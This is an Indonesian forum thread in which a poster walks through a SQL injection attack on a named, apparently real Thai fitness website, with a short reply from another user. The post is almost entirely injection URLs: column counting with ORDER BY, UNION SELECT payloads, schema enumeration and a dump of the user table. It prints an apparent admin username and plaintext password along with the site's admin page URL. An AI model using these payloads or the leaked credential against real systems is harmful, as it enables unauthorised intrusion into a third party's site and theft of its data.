Fatihul Ulum Community of Knowledge
Would you like to react to this message? Create an account in a few clicks or log in to continue.

SQL Injection Real Version (2)

2 posters

Go down

SQL Injection Real Version (2) Empty Re: SQL Injection Real Version (2)

Post  pr0gramm3r007 Sat Oct 30, 2010 4:41 am

Ikutan ah..
siapa tau bisa.. xixixixi :p

pr0gramm3r007

Jumlah posting : 1
Registration date : 30.10.10

Kembali Ke Atas Go down

SQL Injection Real Version (2) Empty SQL Injection Real Version (2)

Post  syaf Wed Oct 06, 2010 12:31 am

== START ==

Code: http://www.fitnessthailand.co.th/activities_01.php?activity_id=31

Web diatas berjalan Normal
Wokeh skrg...qta Tambahkan penyedap rasa hehehe Very Happy " - "
Code : http://www.fitnessthailand.co.th/activities_01.php?activity_id='31
Web Blank/kosong/Error berarti "Vuln Sql Injection"
Sekarang kita lanjutkan dengan mengecek jumlah kolom dari web ini dengan perintah "order by". Disini kita harus mengurutkan angka "1" sampai akhir hingga menampilkan error seperti ini:
Code:

http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+1--
>> normal

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+2--
>> normal

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+3--
>> normal

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+4--
>> normal

Code:

http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+5--
>> normal

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=31+order+by+6--
>> UpZz..Web Blank konten menjadi hilang/error lagi. Ini berarti kolom hanya ada 5 karena 6 tidak tersedia

NB : Perlu di ingat pengurutan ini dimulai dari angka 1 sampai tampilan error/blank, dan seterus'y. Hadooh Capek...ngaso dulu agh !!!

Setelah itu kita mengecek kolom yang bermasalah dengan perintah "union+all+select" atau "union+select" seperti ini:


Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,3,4,5--

Oh iya kita harus menambahkan tanda min " - " pada akhir id content seperti ini: "activity_id=-31"

Setelah itu akan muncul tampilan yang menampilkan kolom yang bermasalah seperti ini :

Muncul angka 2 & 3 yang tebal seperti diatas, angka inilah yang nantinya kita gunakan sebagai referensi.

Sekarang kita mengecek versi dari MySQL yang dipakai di web ini dengan menambahkan sintak "version()" atau "@@version" pada kolom yang bermasalah tadi seperti ini:


Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,version(),4,5--
Akan muncul versi dari MySQL yang dipakai seperti ini :
"5.0.45-community-nt"

Sekarang kita lanjutkan dengan menampilkan table-table dengan perintah "...group_concat(table_name)...+from+information_schema.tables+where+table_schema=database()" seperti ini:


Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--

>> Akan muncul table-table seperti ini:
tbl_activity,tbl_class_description,tbl_class_period,tbl_class_schedule,tbl_class_time,tbl_class_type,tbl_facilityimage,tbl_image,tbl_mem_grp,tbl_promotions,tbl_rate,tbl_users



Setelah table sudah ada sekarang kita akan mengeluarkan column dari table tersebut dengan perintah "...group_concat(column_name)...+information_schema.columns+where+table_name=[nama hex sql table], pilihlah table yang akan ditampilkan column nya, disini ane memilih table tbl_users seperti ini:

Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x74626c5f7573657273


0x74626c5f7573657273 >> tbl_user setelah di mysql hex encode. Untuk meng-convert menjadi mysql hex dapat menggunakan web ini: http://www.waraxe.us/sql-char-encoder.html


Kemudian column-column akan muncul seperti ini:
user_id,c_username,c_password


Sekarang kita akan mengeluarkan isi dari column c_username dan c_password dengan perintah "...group_concat([namakolom yang diinginkan],0x3a,[namakolom yang diinginkan])...+from+[nama tabel]-- seperti ini:


Code:
http://www.fitnessthailand.co.th/activities_01.php?activity_id=-31+union+all+select+1,2,group_concat(c_username,0x3a,c_password,0x3a),4,5+from+tbl_users--

fitnessthailand:ftcm410356:

Dan akan menampilkan isi dari kolom tersebut seperti ini :

Terakhir Tgl cari halaman adminnya.

halaman admin --> http://www.fitnessthailand.co.th/admin/

syaf
Pejuang
Pejuang

Jumlah posting : 63
Age : 78
Lokasi : ~#root | system32
Registration date : 25.02.09

Kembali Ke Atas Go down

Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik